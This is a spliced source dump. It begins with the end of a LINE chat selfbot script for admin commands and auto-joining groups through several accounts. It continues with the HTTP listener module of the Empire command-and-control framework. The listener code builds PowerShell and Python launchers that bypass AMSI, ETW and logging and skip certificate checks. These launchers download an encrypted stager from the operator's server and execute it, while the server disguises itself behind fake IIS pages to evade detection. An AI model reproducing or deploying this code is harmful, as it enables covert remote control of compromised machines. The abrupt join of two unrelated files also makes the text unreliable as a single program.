cl.sendMessage(msg.to, "「Welcome Msg」\nWelcome Msg mu :\n\n「 " + str(wait["welcome"]) + " 」")
elif text.lower() == "cek respon":
if msg._from in admin:
cl.sendMessage(msg.to, "「Respon Msg」\nRespon Msg mu :\n\n「 " + str(wait["Respontag"]) + " 」")
elif text.lower() == "cek spam":
if msg._from in admin:
cl.sendMessage(msg.to, "「Spam Msg」\nSpam Msg mu :\n\n「 " + str(Setmain["RAmessage1"]) + " 」")
elif text.lower() == "cek sider":
if msg._from in admin:
cl.sendMessage(msg.to, "「Sider Msg」\nSider Msg mu :\n\n「 " + str(wait["mention"]) + " 」")
#===========JOIN TICKET============#
elif "/ti/g/" in msg.text.lower():
if wait["selfbot"] == True:
if msg._from in admin:
if settings["autoJoinTicket"] == True:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
group = cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group1 = ki.findGroupByTicket(ticket_id)
ki.acceptGroupInvitationByTicket(group1.id,ticket_id)
ki.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group2 = kk.findGroupByTicket(ticket_id)
kk.acceptGroupInvitationByTicket(group2.id,ticket_id)
kk.sendMessage(msg.to, "Masuk : %s" % str(group.name))
group3 = kc.findGroupByTicket(ticket_id)
kc.acceptGroupInvitationByTicket(group3.id,ticket_id)
kc.sendMessage(msg.to, "Masuk : %s" % str(group.name))
except Exception as error:
print (error)
# Main polling loop: fetch up to 50 pending operations from the LINE
# long-poll endpoint and dispatch each one to the bot() handler.
while True:
    try:
        ops = poll.singleTrace(count=50)
        if ops is not None:
            for op in ops:
                # bot(op)
                # Do not remove this line, or you will get errors soon!
                poll.setRevision(op.revision)
                thread1 = threading.Thread(target=bot, args=(op,))#self.OpInterrupt[op.type], args=(op,)
                #thread1.daemon = True
                thread1.start()
                # NOTE(review): join() immediately after start() makes this
                # effectively synchronous — operations are processed one at a
                # time, not concurrently. Presumably intentional for ordering;
                # confirm before "fixing".
                thread1.join()
    except Exception as e:
        # NOTE(review): every error (including network failures) is silently
        # swallowed and the loop retries immediately — consider logging.
        pass
|
http.py | from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
def __init__(self, mainMenu, params=[]):
    """
    Set up listener metadata, the runtime-settable option table, and
    per-instance state (threads, staging key, session cookie, lock).

    Parameters
    ----------
    mainMenu : object
        The Empire controller/main-menu instance; stored for later use and
        consulted here (via helpers.get_config) for the default staging key.
    params : list, optional
        Not read by this constructor; kept for signature compatibility with
        the other listener modules.
        NOTE(review): mutable default argument is a Python anti-pattern, but
        it is harmless here since the list is never read or mutated.
    """
    # Static, display-only metadata describing this listener module.
    self.info = {
        'Name': 'HTTP[S]',
        'Author': ['@harmj0y'],
        'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
        'Category': ('client_server'),
        'Comments': []
    }
    # any options needed by the stager, settable during runtime
    self.options = {
        # format:
        #   value_name : {description, required, default_value}
        'Name': {
            'Description': 'Name for the listener.',
            'Required': True,
            'Value': 'http'
        },
        'Host': {
            'Description': 'Hostname/IP for staging.',
            'Required': True,
            'Value': "http://%s" % (helpers.lhost())
        },
        'BindIP': {
            'Description': 'The IP to bind to on the control server.',
            'Required': True,
            'Value': '0.0.0.0'
        },
        'Port': {
            'Description': 'Port for the listener.',
            'Required': True,
            'Value': ''
        },
        'Launcher': {
            'Description': 'Launcher string.',
            'Required': True,
            'Value': 'powershell -noP -sta -w 1 -enc '
        },
        'StagingKey': {
            'Description': 'Staging key for initial agent negotiation.',
            'Required': True,
            'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
        },
        'DefaultDelay': {
            'Description': 'Agent delay/reach back interval (in seconds).',
            'Required': True,
            'Value': 5
        },
        'DefaultJitter': {
            'Description': 'Jitter in agent reachback interval (0.0-1.0).',
            'Required': True,
            'Value': 0.0
        },
        'DefaultLostLimit': {
            'Description': 'Number of missed checkins before exiting',
            'Required': True,
            'Value': 60
        },
        'DefaultProfile': {
            'Description': 'Default communication profile for the agent.',
            'Required': True,
            'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
        },
        'CertPath': {
            'Description': 'Certificate path for https listeners.',
            'Required': False,
            'Value': ''
        },
        'KillDate': {
            'Description': 'Date for the listener to exit (MM/dd/yyyy).',
            'Required': False,
            'Value': ''
        },
        'WorkingHours': {
            'Description': 'Hours for the agent to operate (09:00-17:00).',
            'Required': False,
            'Value': ''
        },
        'Headers': {
            'Description': 'Headers for the control server.',
            'Required': True,
            'Value': 'Server:Microsoft-IIS/7.5'
        },
        'Cookie': {
            'Description': 'Custom Cookie Name',
            'Required': False,
            'Value': ''
        },
        'StagerURI': {
            'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
            'Required': False,
            'Value': ''
        },
        'UserAgent': {
            'Description': 'User-agent string to use for the staging request (default, none, or other).',
            'Required': False,
            'Value': 'default'
        },
        'Proxy': {
            'Description': 'Proxy to use for request (default, none, or other).',
            'Required': False,
            'Value': 'default'
        },
        'ProxyCreds': {
            'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
            'Required': False,
            'Value': 'default'
        },
        'SlackURL': {
            'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
            'Required': False,
            'Value': ''
        }
    }
    # required:
    self.mainMenu = mainMenu
    self.threads = {}
    # optional/specific for this module
    self.app = None
    # URIs come from the first '|'-separated field of DefaultProfile,
    # comma-split with leading/trailing slashes stripped.
    self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
    # set the default staging key to the controller db default
    self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
    # randomize the length of the default_response and index_page headers to evade signature based scans
    self.header_offset = random.randint(0, 64)
    # used to protect self.http and self.mainMenu.conn during threaded listener access
    self.lock = threading.Lock()
    self.session_cookie = ''
    # check if the current session cookie not empty and then generate random cookie
    # NOTE(review): session_cookie was assigned '' on the previous line, so
    # this condition is always true and a cookie is always generated —
    # presumably intended to guard a future re-init path; confirm.
    if self.session_cookie == '':
        self.options['Cookie']['Value'] = self.generate_cookie()
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
    """
    Imitate an IIS 7.5 405 "method not allowed" error page.

    Returned when a request arrives with an HTTP verb the listener does
    not serve; the markup mirrors a stock IIS error response.
    """
    rows = (
        '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
        '<html xmlns="http://www.w3.org/1999/xhtml">',
        '<head>',
        '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
        '<title>405 - HTTP verb used to access this page is not allowed.</title>',
        '<style type="text/css">',
        '<!--',
        'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
        'fieldset{padding:0 15px 10px 15px;} ',
        'h1{font-size:2.4em;margin:0;color:#FFF;}',
        'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
        'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
        '#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
        'background-color:#555555;}',
        '#content{margin:0 0 0 2%;position:relative;}',
        '.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
        '-->',
        '</style>',
        '</head>',
        '<body>',
        '<div id="header"><h1>Server Error</h1></div>',
        '<div id="content">',
        ' <div class="content-container"><fieldset>',
        ' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
        ' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
        ' </fieldset></div>',
        '</div>',
        '</body>',
        '</html>\r\n',
    )
    return '\r\n'.join(rows)
def index_page(self):
    """
    Return the stock IIS7 welcome page served for unmatched requests,
    so the listener root looks like a default Windows web server.
    """
    rows = (
        '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
        '<html xmlns="http://www.w3.org/1999/xhtml">',
        '<head>',
        '<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
        '<title>IIS7</title>',
        '<style type="text/css">',
        '<!--',
        'body {',
        ' color:#000000;',
        ' background-color:#B3B3B3;',
        ' margin:0;',
        '}',
        '',
        '#container {',
        ' margin-left:auto;',
        ' margin-right:auto;',
        ' text-align:center;',
        ' }',
        '',
        'a img {',
        ' border:none;',
        '}',
        '',
        '-->',
        '</style>',
        '</head>',
        '<body>',
        '<div id="container">',
        '<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
        '</div>',
        '</body>',
        '</html>',
    )
    return '\r\n'.join(rows)
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
stager = helpers.keyword_obfuscation(stager)
self.lock.release()
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "./data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
conn = self.get_db_connection()
self.lock.acquire()
code = helpers.keyword_obfuscation(code)
self.lock.release()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "./data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
